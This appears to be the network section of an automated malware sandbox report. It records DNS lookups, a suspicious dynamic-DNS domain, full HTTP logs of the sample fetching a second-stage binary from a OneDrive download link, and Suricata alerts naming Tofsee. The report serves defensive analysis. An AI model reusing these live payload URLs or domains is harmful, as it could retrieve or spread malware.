Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| twistednerd.dvrlists.com | 62.102.148.152 | |
| ya5qxq.sn.files.1drv.com |
CNAME
sn-files.fe.1drv.com
CNAME
l-0003.l-msedge.net
|
13.107.42.12 |
| onedrive.live.com |
CNAME
l-0004.l-msedge.net
|
13.107.42.13 |
- UDP Requests
-
-
192.168.56.102:52062 164.124.101.2:53
-
192.168.56.102:52336 164.124.101.2:53
-
192.168.56.102:58838 164.124.101.2:53
-
192.168.56.102:64034 164.124.101.2:53
-
192.168.56.102:64472 164.124.101.2:53
-
192.168.56.102:64995 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:49152 239.255.255.250:3702
-
192.168.56.102:49164 239.255.255.250:1900
-
GET
302
https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21145&authkey=AFt5mXo5_hIU9Wo
REQUEST
RESPONSE
BODY
GET /download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21145&authkey=AFt5mXo5_hIU9Wo HTTP/1.1
User-Agent: zipo
Host: onedrive.live.com
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://ya5qxq.sn.files.1drv.com/y4mWV0lrv_tiHoBpZFLgeGeAoOLHwgJmNqdH0OgjUFuy2BNr8G1IO_HRyR6jrXDrImiFe2QUvT74VBUi5sedcd9fLF9dxoWww6_21cF9mI_hsgFoBYR5C-53tzBarzEgUjh_sHrNCdGK_piD2dAN0Pt76qJhizWP4egLLhy7FriuiAueVsovba7AN1mG-Ds_Hqv63TZr0t6kELXRIsqvIrriA/Zmtabitkattqctosiqoboivzoukwwhu?download&psid=1
Set-Cookie: E=P:PJnPEWBv2Yg=:R2YY22r/pXb9/Ia5SxyORhaOo3W0hNpk56ihHgbTE2k=:F; domain=.live.com; path=/
Set-Cookie: xid=f3dcb26d-9336-4416-8b84-b93f2fe590ad&&RDE42AAC88C842&292; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 04-Sep-2021 03:14:25 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Sat, 11-Sep-2021 04:54:26 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: RDE42AAC88C842
X-ODWebServer: canadacentral0-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: E4C62B59F02447348C07E35B9C97A0A5 Ref B: SLAEDGE1116 Ref C: 2021-09-04T04:54:25Z
Date: Sat, 04 Sep 2021 04:54:26 GMT
Content-Length: 0
GET
200
https://ya5qxq.sn.files.1drv.com/y4mWV0lrv_tiHoBpZFLgeGeAoOLHwgJmNqdH0OgjUFuy2BNr8G1IO_HRyR6jrXDrImiFe2QUvT74VBUi5sedcd9fLF9dxoWww6_21cF9mI_hsgFoBYR5C-53tzBarzEgUjh_sHrNCdGK_piD2dAN0Pt76qJhizWP4egLLhy7FriuiAueVsovba7AN1mG-Ds_Hqv63TZr0t6kELXRIsqvIrriA/Zmtabitkattqctosiqoboivzoukwwhu?download&psid=1
REQUEST
RESPONSE
BODY
GET /y4mWV0lrv_tiHoBpZFLgeGeAoOLHwgJmNqdH0OgjUFuy2BNr8G1IO_HRyR6jrXDrImiFe2QUvT74VBUi5sedcd9fLF9dxoWww6_21cF9mI_hsgFoBYR5C-53tzBarzEgUjh_sHrNCdGK_piD2dAN0Pt76qJhizWP4egLLhy7FriuiAueVsovba7AN1mG-Ds_Hqv63TZr0t6kELXRIsqvIrriA/Zmtabitkattqctosiqoboivzoukwwhu?download&psid=1 HTTP/1.1
User-Agent: zipo
Host: ya5qxq.sn.files.1drv.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 582656
Content-Type: application/octet-stream
Content-Location: https://ya5qxq.sn.files.1drv.com/y4m-CR8ujAKFMEnj2yg8698JJ3QNw5T0n5iUyMrlBuVD9VQEgUKRJfVTVF0gYoqPj2FlJZ4RbzSW3x1nFxdE-DzjDylq6h3m-_4VsEp88RHn7XoDHhhr3oIgwnE_zWTDaxUKntfgFtx5yAJbtfPPDZZ-9gplsAbsUSgehPedqBZXADYzsGmOxQ7lpRfeg4ksW3D
Expires: Fri, 03 Dec 2021 04:54:27 GMT
Last-Modified: Fri, 03 Sep 2021 14:33:10 GMT
Accept-Ranges: bytes
ETag: D6676A9A61E841F3!145.2
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-MSNSERVER: SN3PPF727CA4893
Strict-Transport-Security: max-age=31536000; includeSubDomains
MS-CV: j7gO2WkISE6ppSqCkb/VAw.0
X-SqlDataOrigin: S
CTag: aYzpENjY3NkE5QTYxRTg0MUYzITE0NS4yNTc
X-PreAuthInfo: rv;poba;
Content-Disposition: attachment; filename="Zmtabitkattqctosiqoboivzoukwwhu"
X-Content-Type-Options: nosniff
X-StreamOrigin: X
X-AsmVersion: UNKNOWN; 19.749.824.2003
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: ECAC8915453544898FADFF11F9535953 Ref B: SLAEDGE1120 Ref C: 2021-09-04T04:54:27Z
Date: Sat, 04 Sep 2021 04:54:26 GMT
GET
302
https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21145&authkey=AFt5mXo5_hIU9Wo
REQUEST
RESPONSE
BODY
GET /download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21145&authkey=AFt5mXo5_hIU9Wo HTTP/1.1
User-Agent: aswe
Host: onedrive.live.com
Cache-Control: no-cache
Cookie: E=P:PJnPEWBv2Yg=:R2YY22r/pXb9/Ia5SxyORhaOo3W0hNpk56ihHgbTE2k=:F; xid=f3dcb26d-9336-4416-8b84-b93f2fe590ad&&RDE42AAC88C842&292; xidseq=1; wla42=
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://ya5qxq.sn.files.1drv.com/y4mhkdES2FrzkTr6_ft2vmvKfb9bGMafvF6erpDGpYTyyTou4wOYM--o-pDpWFRoe7XtvHGmX-j_fZ9jW-sMy0xF9LNy6xYLxCqh457rSVvRZ9mXnrhAbWBC7JoY6cVQXsaxJXaqxeEx9ypdygh-0x4PHsyE4Rqwgt5FVSoogr_d7kT53WzOlK4QTYdvaXtyMutkLvh5570BfFK65a9VkcfOA/Zmtabitkattqctosiqoboivzoukwwhu?download&psid=1
Set-Cookie: E=P:ihL6EmBv2Yg=:6r2uVR8+nwEHaGvVOvvG0D/RSGO2Dzbc011dXpgrQj0=:F; domain=.live.com; path=/
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 04-Sep-2021 03:14:27 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Sat, 11-Sep-2021 04:54:27 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: RDE42AAC88C842
X-ODWebServer: canadacentral0-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: CC89F0DDA989482D9E610A0565AE86D3 Ref B: SLAEDGE1116 Ref C: 2021-09-04T04:54:27Z
Date: Sat, 04 Sep 2021 04:54:27 GMT
Content-Length: 0
GET
200
https://ya5qxq.sn.files.1drv.com/y4mhkdES2FrzkTr6_ft2vmvKfb9bGMafvF6erpDGpYTyyTou4wOYM--o-pDpWFRoe7XtvHGmX-j_fZ9jW-sMy0xF9LNy6xYLxCqh457rSVvRZ9mXnrhAbWBC7JoY6cVQXsaxJXaqxeEx9ypdygh-0x4PHsyE4Rqwgt5FVSoogr_d7kT53WzOlK4QTYdvaXtyMutkLvh5570BfFK65a9VkcfOA/Zmtabitkattqctosiqoboivzoukwwhu?download&psid=1
REQUEST
RESPONSE
BODY
GET /y4mhkdES2FrzkTr6_ft2vmvKfb9bGMafvF6erpDGpYTyyTou4wOYM--o-pDpWFRoe7XtvHGmX-j_fZ9jW-sMy0xF9LNy6xYLxCqh457rSVvRZ9mXnrhAbWBC7JoY6cVQXsaxJXaqxeEx9ypdygh-0x4PHsyE4Rqwgt5FVSoogr_d7kT53WzOlK4QTYdvaXtyMutkLvh5570BfFK65a9VkcfOA/Zmtabitkattqctosiqoboivzoukwwhu?download&psid=1 HTTP/1.1
User-Agent: aswe
Host: ya5qxq.sn.files.1drv.com
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 582656
Content-Type: application/octet-stream
Content-Location: https://ya5qxq.sn.files.1drv.com/y4m-CR8ujAKFMEnj2yg8698JJ3QNw5T0n5iUyMrlBuVD9VQEgUKRJfVTVF0gYoqPj2FlJZ4RbzSW3x1nFxdE-DzjDylq6h3m-_4VsEp88RHn7XoDHhhr3oIgwnE_zWTDaxUKntfgFtx5yAJbtfPPDZZ-9gplsAbsUSgehPedqBZXADYzsGmOxQ7lpRfeg4ksW3D
Expires: Fri, 03 Dec 2021 04:54:28 GMT
Last-Modified: Fri, 03 Sep 2021 14:33:10 GMT
Accept-Ranges: bytes
ETag: D6676A9A61E841F3!145.2
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-MSNSERVER: SN4PPF4640852D9
Strict-Transport-Security: max-age=31536000; includeSubDomains
MS-CV: zLI2pZbTNE6yeBOBnrn0uA.0
X-SqlDataOrigin: S
CTag: aYzpENjY3NkE5QTYxRTg0MUYzITE0NS4yNTc
X-PreAuthInfo: rv;poba;
Content-Disposition: attachment; filename="Zmtabitkattqctosiqoboivzoukwwhu"
X-Content-Type-Options: nosniff
X-StreamOrigin: X
X-AsmVersion: UNKNOWN; 19.742.813.2004
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 1BFBADBD855D446C940B769D52BD7FE2 Ref B: SLAEDGE1118 Ref C: 2021-09-04T04:54:27Z
Date: Sat, 04 Sep 2021 04:54:27 GMT
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.102:49165 -> 13.107.42.12:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
| TCP 192.168.56.102:49164 -> 13.107.42.13:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
| TCP 192.168.56.102:49166 -> 13.107.42.12:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.102:49164 13.107.42.13:443 |
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01 | CN=onedrive.com | 50:2f:33:10:92:ac:27:7b:17:be:82:68:3b:e2:29:ad:97:41:b7:bb |
|
TLSv1 192.168.56.102:49165 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com | ec:e5:02:98:e6:c9:9a:12:fc:c0:4d:19:cd:2b:0c:ae:d0:c0:37:8e |
|
TLSv1 192.168.56.102:49166 13.107.42.12:443 |
C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com | ec:e5:02:98:e6:c9:9a:12:fc:c0:4d:19:cd:2b:0c:ae:d0:c0:37:8e |
Snort Alerts
No Snort Alerts